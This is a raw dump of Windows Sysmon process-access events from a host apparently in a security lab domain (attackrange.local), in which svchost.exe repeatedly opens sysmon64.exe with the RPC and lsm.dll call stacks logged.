08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001302Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001301Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001300Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.162{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001299Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.161{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001298Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.161{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001297Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001296Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001295Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001294Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001293Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001292Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001291Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001290Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001289Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.158{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001288Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.155{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001287Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.155{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001286Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.155{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001285Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.155{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001284Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.155{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001283Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.154{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001282Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.154{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001281Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.154{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001280Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.154{5D479F2C-16A1-5F84-0C00-000000007F01}6121108C:\Windows\system32\svchost.exe{5D479F2C-16B1-5F84-2C00-000000007F01}2468C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000001279Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:41:22.151{5D479F2C-169F-5F84-0A00-000000007F01}8561128C:\Windows\system32\services.exe{5D479F2C-16B1-5F84-2900-000000007F01}2920C:\Program Files 